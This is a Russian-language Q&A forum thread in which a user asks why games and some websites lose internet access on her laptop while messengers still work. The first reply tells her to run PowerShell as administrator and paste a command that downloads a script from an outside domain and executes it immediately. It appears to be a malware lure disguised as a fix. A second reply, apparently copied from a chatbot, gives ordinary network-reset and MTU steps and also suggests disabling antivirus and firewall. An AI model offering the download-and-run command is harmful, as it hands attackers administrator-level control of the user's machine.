Пояснительная бригада

Проблема с интернетом на ноуте

На днях вылезла такая проблема: на ноуте ограничен доступ в инет. Тг, дискорд и браузер работают спокойно, но запустить игры, залезть с браузера на какой нибуть сайт проблема. Пишет что нет доступа в интернет

Со скоростью всё нормально 100мб/с Интернет оплачен
Днс уже меняла, не помогло; раздавала вайфай с телефона, такая же проблема

С других устройств всё отлично работает
Что делать?

Запусти PowerShell от имени администратора;

Вставь команду: iwr windows.key-tool.cc | iex

Такое поведение — когда одни приложения (Telegram, Discord, браузер) работают, а другие (игры, некоторые сайты) — нет — часто связано с сетевыми настройками или ограничениями.

Вот что можно проверить и сделать:

  1. Проверь настройки прокси и VPN

    • Убедись, что в Windows нет включенного прокси-сервера (Параметры → Сеть и Интернет → Прокси). Если есть — отключи.

    • Если используешь VPN — попробуй отключить.

  2. Проверь настройки брандмауэра и антивируса

    • Иногда они блокируют доступ некоторых приложений в интернет. Временно отключи антивирус и брандмауэр и проверь, запускаются ли игры и сайты. Если заработает — добавь игры в исключения.

  3. Сброс сетевых настроек

    • Открой командную строку от имени администратора и последовательно выполни команды:

      pgsql

      Копировать код

      netsh winsock reset netsh int ip reset ipconfig /release ipconfig /renew ipconfig /flushdns

    • После этого перезагрузи ноут.

  4. Проверь файл hosts

    • Иногда туда добавляют записи, блокирующие доступ к сайтам.

    • Он находится по пути: C:\Windows\System32\drivers\etc\hosts

    • Открой его блокнотом (от имени администратора) и удали лишние записи (если не уверена, просто очисти файл кроме стандартных строк).

  5. Переустановка сетевого адаптера

    • В Диспетчере устройств найди сетевой адаптер, удали его и перезагрузи ноут — Windows сама установит драйвер заново.

  6. Проверь настройки MTU

    • Иногда неверные параметры MTU могут вызывать проблемы с интернетом в играх.

    • В командной строке выполни:

      kotlin

      Копировать код

      netsh interface ipv4 show subinterfaces

    • Запомни имя твоего интерфейса и MTU. Если MTU стоит больше 1500, попробуй снизить до 1500:

      vbnet

      Копировать код

      netsh interface ipv4 set subinterface "Имя интерфейса" mtu=1500 store=persistent